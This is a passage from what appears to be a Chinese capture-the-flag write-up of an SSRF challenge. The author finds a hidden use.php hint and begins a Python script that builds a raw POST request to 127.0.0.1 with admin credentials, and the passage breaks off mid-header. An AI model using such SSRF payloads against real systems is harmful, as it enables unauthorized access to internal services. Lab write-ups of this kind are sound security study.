先看题 题目描述什么也没有
点进去题目场景看看
you are not an inner user, so we can not let you have identify~ 只能内部访问登录
看下页面源代码
16行 有一行注释 <!-- use.php --> 把use.php加到URL后边看一下
到这可以判断出是SSRF 先写个playload 实现内部访问
import urllib.parse
host = "127.0.0.1:80"
content = "uname=admin&passwd=admin"
content_length = len(content)test =\
"""POST /index.php HTTP/1.1
Host: {}
User-Agent: curl/7.43.0
Accept: */*
Conte